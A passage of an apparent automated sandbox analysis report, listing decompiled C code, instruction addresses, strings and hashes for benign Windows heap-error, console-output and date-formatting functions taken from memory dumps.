						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0339B150();
				} else {
					E0339B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0339B150("Error code: %d - %s\n",  *0x3485898);
				_t113 =  *0x34858a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0339B150();
					} else {
						E0339B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0339B150("Parameter1: %p\n",  *0x34858a4);
				}
				_t115 =  *0x34858a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0339B150();
					} else {
						E0339B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0339B150("Parameter2: %p\n",  *0x34858a8);
				}
				_t117 =  *0x34858ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0339B150();
					} else {
						E0339B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0339B150("Parameter3: %p\n",  *0x34858ac);
				}
				_t119 =  *0x34858b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0339B150();
					} else {
						E0339B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x34858b4);
					E0339B150("Last known valid blocks: before - %p, after - %p\n",  *0x34858b0);
				} else {
					_t120 =  *0x34858b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0339B150();
				} else {
					E0339B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0339B150("Stack trace available at %p\n", 0x34858c0);
			}

0x03451c10
0x03451c16
0x03451c1e
0x03451c3d
0x03451c3e
0x03451c20
0x03451c35
0x03451c3a
0x03451c44
0x03451c55
0x03451c5a
0x03451c65
0x03451c67
0x00000000
0x03451c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x03451c67
0x03451cdc
0x03451ce5
0x03451d04
0x03451d05
0x03451ce7
0x03451cfc
0x03451d01
0x03451d0b
0x03451d17
0x03451d1f
0x03451d25
0x03451d30
0x03451d4f
0x03451d50
0x03451d32
0x03451d47
0x03451d4c
0x03451d61
0x03451d67
0x03451d68
0x03451d6e
0x03451d79
0x03451d98
0x03451d99
0x03451d7b
0x03451d90
0x03451d95
0x03451daa
0x03451db0
0x03451db1
0x03451db7
0x03451dc2
0x03451de1
0x03451de2
0x03451dc4
0x03451dd9
0x03451dde
0x03451df3
0x03451df9
0x03451dfa
0x03451e00
0x03451e0a
0x03451e13
0x03451e32
0x03451e33
0x03451e15
0x03451e2a
0x03451e2f
0x03451e39
0x03451e4a
0x03451e02
0x03451e02
0x03451e08
0x00000000
0x00000000
0x03451e08
0x03451e5b
0x03451e7a
0x03451e7b
0x03451e5d
0x03451e72
0x03451e77
0x03451e95

Strings

heap_failure_buffer_underrun, xrefs: 03451C9F
heap_failure_unknown, xrefs: 03451C75
Parameter1: %p, xrefs: 03451D5C
heap_failure_multiple_entries_corruption, xrefs: 03451C8A
heap_failure_generic, xrefs: 03451C7C
heap_failure_lfh_bitmap_mismatch, xrefs: 03451CD7
heap_failure_virtual_block_corruption, xrefs: 03451C91
heap_failure_freelists_corruption, xrefs: 03451CC9
HEAP: , xrefs: 03451C16, 03451C3D, 03451D04, 03451D4F, 03451D98, 03451DE1, 03451E32, 03451E7A
Parameter3: %p, xrefs: 03451DEE
Parameter2: %p, xrefs: 03451DA5
Stack trace available at %p, xrefs: 03451E86
heap_failure_invalid_allocation_type, xrefs: 03451CB4
heap_failure_cross_heap_operation, xrefs: 03451CC2
HEAP[%wZ]: , xrefs: 03451C30, 03451CF7, 03451D42, 03451D8B, 03451DD4, 03451E25, 03451E6D
heap_failure_invalid_argument, xrefs: 03451CAD
heap_failure_listentry_corruption, xrefs: 03451CD0
Last known valid blocks: before - %p, after - %p, xrefs: 03451E45
heap_failure_internal, xrefs: 03451C6E
heap_failure_buffer_overrun, xrefs: 03451C98
Error code: %d - %s, xrefs: 03451D12
heap_failure_block_not_busy, xrefs: 03451CA6
heap_failure_usage_after_free, xrefs: 03451CBB
Heap error detected at %p (heap handle %p), xrefs: 03451C50
heap_failure_entry_corruption, xrefs: 03451C83

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 5f56045a46031ef1551862144c48d0b467c7298ccd0182db4c53d987e1908feb
Instruction ID: 563c6d310b2c198d2f63811ca078bb794ec8c103731d5f9af6e9f3f1406dea6a
Opcode Fuzzy Hash: 5f56045a46031ef1551862144c48d0b467c7298ccd0182db4c53d987e1908feb
Instruction Fuzzy Hash: 2761883AD61744DFDA12FB44E4C5F29B3E4EB05920B09446FF81A6F312D67598818A1E

Uniqueness

Uniqueness Score: -1.00%

Function 0033C5CA, Relevance: 30.2, APIs: 20, Instructions: 238
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0033C5CA(void* __ecx, long __edx, void* _a4, signed int _a8) {
				signed int _v8;
				short _v16;
				short _v20;
				signed int _v26;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
				signed int _v50;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v56;
				long _v60;
				signed int _v64;
				void* _v68;
				long _v72;
				long _v76;
				long _v80;
				intOrPtr _v84;
				char _v88;
				void* _v108;
				long _v112;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t63;
				void* _t66;
				long _t68;
				long _t71;
				char* _t81;
				long _t85;
				intOrPtr _t88;
				signed int _t91;
				long _t93;
				long _t95;
				signed short _t100;
				struct _COORD _t105;
				void* _t114;
				void* _t115;
				long _t119;
				long _t122;
				signed int _t125;
				long _t128;
				void* _t138;
				void* _t141;
				void* _t143;
				signed int _t150;

				_t63 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t63 ^ _t150;
				_v64 = _a8;
				_t141 = __ecx;
				_v76 = __edx;
				_t137 = 0;
				_v72 = 0;
				_t66 = E0034269C(_a8);
				if(_t66 == 0) {
					L13:
					_t114 = 0;
				} else {
					__imp___get_osfhandle(__edx);
					_t114 = _t66;
					if(GetConsoleScreenBufferInfo(_t114,  &_v32) == 0) {
						goto L13;
					} else {
						_t137 = _v16 - _v20 - 1;
						_v72 = _t137;
					}
				}
				_v60 = _v60 & 0x00000000;
				_t119 = E0033C6F4(_t141, _a4, _v64);
				_t133 = 0x36b980;
				_v64 = _t119;
				_t142 = _t119;
				_v68 = 0x36b980;
				if(_t119 == 0) {
					_t68 = _v60;
					goto L11;
				} else {
					do {
						if(_t114 == 0) {
							_t119 = _v76;
							_t85 = E003427C8(_t142 + _t142, _t133, _t142 + _t142,  &_v88);
							__eflags = _t85;
							if(_t85 == 0) {
								L16:
								_t68 = GetLastError();
								_v60 = _t68;
								break;
							} else {
								__eflags = _v88 - _t142 + _t142;
								if(_v88 == _t142 + _t142) {
									goto L9;
								} else {
									goto L16;
								}
							}
						} else {
							if( *0x378065 != 0) {
								_t128 =  *0x37851c;
								__eflags = _t128 - _t137;
								if(_t128 < _t137) {
									L33:
									_t143 = _t133;
									_t88 = _t133 + _v64 * 2;
									_v84 = _t88;
									__eflags = _t133 - _t88;
									if(_t133 < _t88) {
										while(1) {
											__eflags = _t128 - _t137;
											if(_t128 >= _t137) {
												break;
											}
											_t91 =  *_t143 & 0x0000ffff;
											_t143 = _t143 + 2;
											__eflags = _t91 - 0xa;
											if(_t91 == 0xa) {
												_t128 = _t128 + 1;
												__eflags = _t128;
											}
											__eflags = _t143 - _v84;
											if(_t143 < _v84) {
												continue;
											}
											break;
										}
										 *0x37851c = _t128;
									}
									_t142 = _t143 - _t133 >> 1;
									goto L8;
								} else {
									 *0x37851c = 0;
									_t93 = GetConsoleScreenBufferInfo(_t114,  &_v32);
									__eflags = _t93;
									if(_t93 == 0) {
										L32:
										_t128 =  *0x37851c;
										_t133 = _v68;
										goto L33;
									} else {
										_t95 = WriteConsoleW(_t114,  *0x378518,  *0x378514,  &_v60, 0);
										__eflags = _t95;
										if(_t95 == 0) {
											goto L32;
										} else {
											FlushConsoleInputBuffer(GetStdHandle(0xfffffff6));
											GetConsoleMode(_t114,  &_v80);
											_t100 = SetConsoleMode(_t114, 0);
											__imp___getch();
											_t137 = _t100 & 0x0000ffff;
											SetConsoleMode(_t114, _v80);
											GetConsoleScreenBufferInfo(_t114,  &_v56);
											_t133 = _v32.dwSize * _v26;
											_push( &_v60);
											_t105 = _v32.dwCursorPosition;
											_push(_t105);
											_t142 = _v56.dwSize * _v50 - _v32.dwSize * _v26 + _t105 + _v56.dwCursorPosition;
											_push(_v56.dwSize * _v50 - _v32.dwSize * _v26 + _t105 + _v56.dwCursorPosition);
											_push(0x20);
											_push(_t114);
											FillConsoleOutputCharacterW();
											SetConsoleCursorPosition(_t114, _v32.dwCursorPosition);
											__eflags = (_t100 & 0x0000ffff) - 3;
											if((_t100 & 0x0000ffff) == 3) {
												EnterCriticalSection( *0x363858);
												 *0x35d544 = 1;
												LeaveCriticalSection( *0x363858);
												_t68 = 0;
												L12:
												return E00346FD0(_t68, _t114, _v8 ^ _t150, _t133, _t137, _t142);
											} else {
												_t137 = _v72;
												goto L32;
											}
										}
									}
								}
							} else {
								_t142 = 0xa0;
								if(_t119 <= 0xa0) {
									_t142 = _t119;
								}
								L8:
								if(WriteConsoleW(_t114, _t133, _t142,  &_v60, 0) == 0) {
									_t68 = GetLastError();
								} else {
									L9:
									_t68 = 0;
								}
								goto L10;
							}
						}
						goto L55;
						L10:
						_t119 = _v64 - _t142;
						_v60 = _t68;
						_v64 = _t119;
						_t133 = _v68 + _t142 * 2;
						_v68 = _t133;
					} while (_t119 != 0);
					L11:
					if(_t68 != 0) {
						__eflags = _v76 - 2;
						if(__eflags != 0) {
							goto L12;
						} else {
							do {
								__eflags = E00344B60(__eflags, 0);
							} while (__eflags == 0);
							exit(1);
							asm("int3");
							while(1) {
								L44:
								__eflags = _t133 - _t114;
								if(_t133 == _t114) {
									_t119 = _t119 + 2;
								}
								while(1) {
									_t134 = _t114;
									_t71 = E0033D7D4(_t119, _t114);
									_t122 = _t71;
									__eflags = _t122;
									if(_t122 == 0) {
										break;
									}
									_t119 = _t122 + 2;
									_t133 =  *_t119 & 0x0000ffff;
									__eflags = _t133 - 0x31 - 8;
									if(_t133 - 0x31 > 8) {
										goto L44;
									} else {
										_t142 = _t142 + 1;
										continue;
									}
									L24:
									__eflags = _v8 ^ _t150;
									return E00346FD0(_t76, _t115, _v8 ^ _t150, _t134, _t137, _t142);
									goto L55;
								}
								_t115 = _v108;
								__eflags = _t142 - _a4;
								if(_t142 > _a4) {
									_t115 = HeapAlloc(GetProcessHeap(), 0, _t142 << 2);
									__eflags = _t115;
									if(_t115 != 0) {
										_t125 = 0;
										__eflags = _t142;
										if(_t142 != 0) {
											_t138 = _v108;
											_t134 = _a4;
											do {
												__eflags = _t125 - _t134;
												if(_t125 >= _t134) {
													_t81 = " ";
												} else {
													 *_t138 =  *_t138 + 4;
													_t81 =  *( *_t138 - 4);
												}
												 *(_t115 + _t125 * 4) = _t81;
												_t125 = _t125 + 1;
												__eflags = _t125 - _t142;
											} while (_t125 < _t142);
											_t137 = _v112;
										}
										_t142 = FormatMessageW(0x3800, 0, _t137, 0, 0x36b980, 0x2000, _t115);
										RtlFreeHeap(GetProcessHeap(), 0, _t115);
										goto L23;
									}
								} else {
									_push(_t115);
									_push(0x2000);
									_push(0x36b980);
									_push(_t71);
									_push(_t137);
									_push(_t71);
									_push(0x1800);
									_t142 = FormatMessageW();
									L23:
									_t76 = _t142;
								}
								goto L24;
							}
						}
					} else {
						goto L12;
					}
				}
				L55:
			}

0x0033c5d2
0x0033c5d9
0x0033c5e3
0x0033c5e7
0x0033c5e9
0x0033c5ec
0x0033c5f0
0x0033c5f3
0x0033c5fa
0x0033c6b9
0x0033c6b9
0x0033c600
0x0033c601
0x0033c607
0x0033c617
0x00000000
0x0033c61d
0x0033c627
0x0033c628
0x0033c628
0x0033c617
0x0033c62e
0x0033c63c
0x0033c63e
0x0033c643
0x0033c646
0x0033c648
0x0033c64d
0x0033c6ef
0x00000000
0x0033c653
0x0033c653
0x0033c655
0x0033c6c4
0x0033c6cb
0x0033c6d0
0x0033c6d2
0x0033c6dc
0x0033c6dc
0x0033c6e2
0x00000000
0x0033c6d4
0x0033c6d7
0x0033c6da
0x00000000
0x00000000
0x00000000
0x00000000
0x0033c6da
0x0033c657
0x0033c65e
0x0034ad2a
0x0034ad30
0x0034ad32
0x0034ae01
0x0034ae04
0x0034ae06
0x0034ae09
0x0034ae0c
0x0034ae0e
0x0034ae10
0x0034ae10
0x0034ae12
0x00000000
0x00000000
0x0034ae14
0x0034ae17
0x0034ae1a
0x0034ae1d
0x0034ae1f
0x0034ae1f
0x0034ae1f
0x0034ae20
0x0034ae23
0x00000000
0x00000000
0x00000000
0x0034ae23
0x0034ae25
0x0034ae25
0x0034ae2d
0x00000000
0x0034ad38
0x0034ad3f
0x0034ad45
0x0034ad4b
0x0034ad4d
0x0034adf8
0x0034adf8
0x0034adfe
0x00000000
0x0034ad53
0x0034ad65
0x0034ad6b
0x0034ad6d
0x00000000
0x0034ad73
0x0034ad7c
0x0034ad87
0x0034ad8f
0x0034ad95
0x0034ad9e
0x0034ada2
0x0034adad
0x0034adc2
0x0034adc9
0x0034adca
0x0034add0
0x0034adda
0x0034addc
0x0034addd
0x0034addf
0x0034ade0
0x0034adea
0x0034adf0
0x0034adf3
0x0034ae3a
0x0034ae46
0x0034ae50
0x0034ae56
0x0033c6a6
0x0033c6b6
0x0034adf5
0x0034adf5
0x00000000
0x0034adf5
0x0034adf3
0x0034ad6d
0x0034ad4d
0x0033c664
0x0033c664
0x0033c66f
0x0033c671
0x0033c671
0x0033c673
0x0033c684
0x0033c6e7
0x0033c686
0x0033c686
0x0033c686
0x0033c686
0x00000000
0x0033c684
0x0033c65e
0x00000000
0x0033c688
0x0033c68e
0x0033c690
0x0033c693
0x0033c696
0x0033c699
0x0033c699
0x0033c69e
0x0033c6a0
0x0034ae5d
0x0034ae61
0x00000000
0x0034ae67
0x0034ae67
0x0034ae6e
0x0034ae6e
0x0034ae74
0x0034ae7a
0x0034ae7b
0x0034ae7b
0x0034ae7b
0x0034ae7e
0x0034ae84
0x0034ae84
0x0033c74b
0x0033c74b
0x0033c74d
0x0033c752
0x0033c754
0x0033c756
0x00000000
0x00000000
0x0033c794
0x0033c797
0x0033c79d
0x0033c7a1
0x00000000
0x0033c7a7
0x0033c7a7
0x00000000
0x0033c7a7
0x0033c781
0x0033c786
0x0033c791
0x00000000
0x0033c791
0x0033c758
0x0033c75b
0x0033c75e
0x0034aea1
0x0034aea3
0x0034aea5
0x0034aeab
0x0034aead
0x0034aeaf
0x0034aeb1
0x0034aeb4
0x0034aeb7
0x0034aeb7
0x0034aeb9
0x0034aec5
0x0034aebb
0x0034aebb
0x0034aec0
0x0034aec0
0x0034aeca
0x0034aecd
0x0034aece
0x0034aece
0x0034aed2
0x0034aed2
0x0034aef3
0x0034aefc
0x00000000
0x0034aefc
0x0033c764
0x0033c764
0x0033c765
0x0033c76a
0x0033c76f
0x0033c770
0x0033c771
0x0033c772
0x0033c77d
0x0033c77f
0x0033c77f
0x0033c77f
0x00000000
0x0033c75e
0x0034ae7b
0x00000000
0x00000000
0x00000000
0x0033c6a0
0x00000000

APIs

Part of subcall function 0034269C: _get_osfhandle.MSVCRT ref: 003426A7
Part of subcall function 0034269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0033C5F8,?,?,?), ref: 003426B6
Part of subcall function 0034269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0033C5C6), ref: 003426D2
Part of subcall function 0034269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00377F20,00000002), ref: 003426E1
Part of subcall function 0034269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 003426EC
Part of subcall function 0034269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00377F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0033C5C6), ref: 003426F5

_get_osfhandle.MSVCRT ref: 0033C601
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,0033C5C6,?,?,?,?,?,?,?,?,?,?,?,?,?,0033C5C6), ref: 0033C60F
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,0036B980,000000A0,00000000,00000000,?,?,?,?,?), ref: 0033C67C
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,?,?,?), ref: 0033C6DC
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0033C6E7

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Console$ErrorLastLockShared_get_osfhandle$AcquireBufferFileHandleInfoModeReleaseScreenTypeWrite
String ID:
API String ID: 2173784998-0
Opcode ID: 687a7302ef254401711d55a4028158d2cca0eddb85d3be72533967a76692f427
Instruction ID: 87d8bd94d0a331c0f852a68cb1f030991608b4df19d38a56ad2caed1058b115d
Opcode Fuzzy Hash: 687a7302ef254401711d55a4028158d2cca0eddb85d3be72533967a76692f427
Instruction Fuzzy Hash: AD81A571E10218AFDB26DFA4DC89ABEBBFDEB44311F15512AF80AE6150DB309D85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00335AEF, Relevance: 30.1, APIs: 14, Strings: 3, Instructions: 367
timeCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00335AEF(void* __ecx, intOrPtr __edx, signed int _a4, intOrPtr _a8) {
				signed int _v8;
				char _v76;
				short _v332;
				signed short _v342;
				signed short _v344;
				signed short _v346;
				struct _SYSTEMTIME _v348;
				int _v352;
				int _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				signed int _v368;
				struct _FILETIME _v376;
				struct _FILETIME _v384;
				void _v420;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t78;
				intOrPtr _t89;
				void* _t90;
				signed int _t96;
				signed int _t97;
				void* _t100;
				void* _t101;
				void* _t110;
				void* _t111;
				signed short _t118;
				long _t128;
				short* _t130;
				void* _t136;
				signed int _t139;
				void* _t143;
				void _t145;
				void _t149;
				signed int _t157;
				signed int _t159;
				signed int _t161;
				int _t164;
				void* _t172;
				signed int _t173;
				signed int _t181;
				signed int _t185;
				void* _t186;
				void* _t189;
				intOrPtr _t197;
				signed int _t202;
				void* _t206;
				void* _t210;
				void* _t211;
				signed int _t212;
				void* _t213;

				_t78 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t78 ^ _t212;
				_t157 = _a4;
				_v364 = __edx;
				_v368 = _t157;
				_v360 = 1;
				if(__ecx != 0) {
					_t161 = 9;
					memcpy( &_v420, __ecx, _t161 << 2);
					_t213 = _t213 + 0xc;
					E00353C49( &_v420,  &_v376);
				} else {
					GetSystemTime( &_v348);
					SystemTimeToFileTime( &_v348,  &_v376);
				}
				FileTimeToLocalFileTime( &_v376,  &_v384);
				FileTimeToSystemTime( &_v384,  &_v348);
				_v352 = 0;
				if( *0x373cc9 == 0) {
					_t194 = _v348 & 0x0000ffff;
					_t208 = _v346 & 0x0000ffff;
					_t206 = _v342 & 0x0000ffff;
					_v352 = _t194;
					if(_v364 == 0) {
						_t181 = 0x64;
						_t194 = _t194 % _t181;
						_v352 = _t194;
					}
					_t89 =  *0x35d540; // 0x0
					if(_t89 != 2) {
						if(_t89 == 1) {
							_t110 = _t208;
							_t208 = _t206;
							_t206 = _t110;
						}
					} else {
						_t111 = _t194;
						_t194 = _t206;
						_t206 = _t208;
						_v352 = _t194;
						_t208 = _t111;
					}
					_t164 =  *0x35d598; // 0x0
					if(_t164 >= 0x20) {
						_t90 =  *0x35d594; // 0x0
						goto L63;
					} else {
						_t90 = realloc( *0x35d594, 0x40);
						_pop(0);
						if(_t90 != 0) {
							_t194 = _v352;
							_t164 = 0x20;
							 *0x35d594 = _t90;
							 *0x35d598 = _t164;
							L63:
							_push(_t194);
							_push(0x35f80c);
							_push(_t206);
							_push(0x35f80c);
							E0034274C(_t90, _t164, L"%02d%s%02d%s%02d", _t208);
							_t213 = _t213 + 0x20;
							_t206 = 2;
							goto L35;
						}
						_push(_t90);
						goto L50;
					}
				} else {
					_v356 = 0;
					if(GetLocaleInfoW(E003441A4(), 0x1f,  &_v332, 0x80) == 0) {
						_t194 = 0x80;
						E00341040( &_v332, 0x80,  *0x35f7f8);
					}
					_t118 = _v332;
					_t210 =  &_v332;
					_t206 = 2;
					if(_t118 == 0) {
						L13:
						if(GetDateFormatW(E003441A4(), 0,  &_v348,  &_v332,  *0x35d594,  *0x35d598) == 0) {
							L32:
							_t208 = GetDateFormatW(E003441A4(), 0,  &_v348,  &_v332, 0, 0);
							if(_t208 == 0) {
								_t128 = GetLastError();
								_push(0);
								L48:
								 *0x373cf0 = _t128;
								_push(_t128);
								L51:
								E0033C5A2(0);
								_t97 = 0;
								L25:
								return E00346FD0(_t97, _t157, _v8 ^ _t212, _t194, _t206, _t208);
							}
							_t208 = _t208 + 1;
							_t130 = realloc( *0x35d594, _t208 + _t208);
							_pop(0);
							if(_t130 == 0) {
								_push(0);
								L50:
								_push(8);
								goto L51;
							}
							 *0x35d594 = _t130;
							 *0x35d598 = _t208;
							_t208 = 0;
							if(GetDateFormatW(E003441A4(), 0,  &_v348,  &_v332, _t130, 0) == 0) {
								_t128 = GetLastError();
								_push(0);
								goto L48;
							}
							L35:
							_t208 =  *0x35d594; // 0x0
							L15:
							_push(E00335AA7(_v344 & 0x0000ffff));
							_t194 = 0x20;
							E00341040( &_v76, _t194);
							if(_t157 == 0) {
								if(_v360 != 0) {
									if(E003368B5() == 0) {
										_push(_t208);
										_push( &_v76);
									} else {
										_push( &_v76);
										_push(_t208);
									}
									_t96 = E003425D9(L"%s %s ");
								} else {
									_push(_t208);
									_t96 = E003425D9(L"%s ");
								}
								_t157 = _t96;
								L24:
								_t97 = _t157;
								goto L25;
							}
							if(_v360 == 0 || _v364 != 1) {
								E00341040(_t157, _a8, _t208);
							} else {
								_t101 = E003368B5();
								_t197 = _a8;
								_t173 = _t157;
								if(_t101 != 0) {
									E00341040(_t173, _t197, _t208);
									E003418C0(_t157, _a8, " ");
									_push( &_v76);
								} else {
									E00341040(_t173, _t197,  &_v76);
									E003418C0(_t157, _a8, " ");
									_push(_t208);
								}
								E003418C0(_t157, _a8);
							}
							_t172 = _t157 + 2;
							_t194 = 0;
							do {
								_t100 =  *_t157;
								_t157 = _t206 + _t157;
							} while (_t100 != 0);
							_t157 = _t157 - _t172 >> 1;
							goto L24;
						}
						_t208 =  *0x35d594; // 0x0
						if(_t208 == 0) {
							goto L32;
						}
						goto L15;
					} else {
						_t159 = _v356;
						_t185 = _t118 & 0x0000ffff;
						_t136 = 0x64;
						do {
							if(_t185 == 0x27) {
								_t210 = _t210 + _t206;
								_t159 = 0 | _t159 == 0x00000000;
								goto L11;
							}
							if(_t159 != 0 || _t185 != _t136 && _t185 != 0x4d) {
								_t210 = _t210 + _t206;
							} else {
								_t202 = 0;
								do {
									_t210 = _t210 + _t206;
									_t202 = _t202 + 1;
								} while ( *_t210 == _t185);
								_v356 = _t210;
								_t211 = _t210 +  ~_t202 * 2;
								if(_t202 != 1) {
									_t143 = 0x64;
									if(_t185 == _t143) {
										_v360 = 0;
									}
									if(_t202 <= 3) {
										_t210 = _v356;
									} else {
										_t194 = _v356;
										_t186 = _t194;
										_v356 = _t186 + 2;
										do {
											_t145 =  *_t186;
											_t186 = _t186 + _t206;
										} while (_t145 != _v352);
										_t210 = _t211 + 6;
										memmove(_t210, _t194, 2 + (_t186 - _v356 >> 1) * 2);
										_t213 = _t213 + 0xc;
									}
									goto L11;
								}
								_t189 = _t211;
								_t194 = _t189 + 2;
								do {
									_t149 =  *_t189;
									_t189 = _t189 + _t206;
								} while (_t149 != _v352);
								memmove(_t211 + 2, _t211, 2 + (_t189 - _t194 >> 1) * 2);
								_t213 = _t213 + 0xc;
								_t210 = _t211 + 4;
							}
							L11:
							_t139 =  *_t210 & 0x0000ffff;
							_t185 = _t139;
							_t136 = 0x64;
						} while (_t139 != 0);
						_t157 = _v368;
						goto L13;
					}
				}
			}

0x00335afa
0x00335b01
0x00335b05
0x00335b0b
0x00335b11
0x00335b17
0x00335b24
0x00349ae4
0x00349aeb
0x00349aeb
0x00349af9
0x00335b2a
0x00335b31
0x00335b45
0x00335b45
0x00335b59
0x00335b6d
0x00335b75
0x00335b81
0x00349bba
0x00349bc1
0x00349bc8
0x00349bcf
0x00349bdb
0x00349be3
0x00349be4
0x00349be6
0x00349be6
0x00349bec
0x00349bf4
0x00349c09
0x00349c0b
0x00349c0d
0x00349c0f
0x00349c0f
0x00349bf6
0x00349bf6
0x00349bf8
0x00349bfa
0x00349bfc
0x00349c02
0x00349c02
0x00349c11
0x00349c1a
0x00349c4c
0x00000000
0x00349c1c
0x00349c24
0x00349c2b
0x00349c2e
0x00349c36
0x00349c3e
0x00349c3f
0x00349c44
0x00349c51
0x00349c51
0x00349c57
0x00349c58
0x00349c59
0x00349c62
0x00349c67
0x00349c6c
0x00000000
0x00349c6c
0x00349c30
0x00000000
0x00349c30
0x00335b87
0x00335b87
0x00335baa
0x00349b09
0x00349b11
0x00349b11
0x00335bb0
0x00335bb7
0x00335bbf
0x00335bc3
0x00335c07
0x00335c32
0x00335d34
0x00335d53
0x00335d57
0x00349b8d
0x00349b95
0x00349b9f
0x00349b9f
0x00349ba4
0x00349bac
0x00349bac
0x00349bb3
0x00335cca
0x00335cda
0x00335cda
0x00335d5d
0x00335d68
0x00335d6f
0x00335d72
0x00349ba9
0x00349baa
0x00349baa
0x00000000
0x00349baa
0x00335d7a
0x00335d8c
0x00335d93
0x00335da4
0x00349b98
0x00349b9e
0x00000000
0x00349b9e
0x00335daa
0x00335daa
0x00335c46
0x00335c52
0x00335c55
0x00335c59
0x00335c60
0x00349c79
0x00349c94
0x00349c9a
0x00349c9b
0x00349c96
0x00349c96
0x00349c97
0x00349c97
0x00349ca1
0x00349c7b
0x00349c7b
0x00349c81
0x00349c87
0x00349ca9
0x00335cc8
0x00335cc8
0x00000000
0x00335cc8
0x00335c6d
0x00349cd4
0x00335c80
0x00335c80
0x00335c85
0x00335c88
0x00335c8c
0x00349cb1
0x00349cc0
0x00349cc8
0x00335c92
0x00335c96
0x00335ca5
0x00335caa
0x00335caa
0x00335cb0
0x00335cb0
0x00335cb5
0x00335cb8
0x00335cba
0x00335cba
0x00335cbd
0x00335cbf
0x00335cc6
0x00000000
0x00335cc6
0x00335c38
0x00335c40
0x00000000
0x00000000
0x00000000
0x00335bc5
0x00335bc5
0x00335bcd
0x00335bd0
0x00335bd1
0x00335bd5
0x00349b1d
0x00349b24
0x00000000
0x00349b24
0x00335bdd
0x00335bf2
0x00335cdd
0x00335cdf
0x00335ce1
0x00335ce1
0x00335ce3
0x00335ce4
0x00335ceb
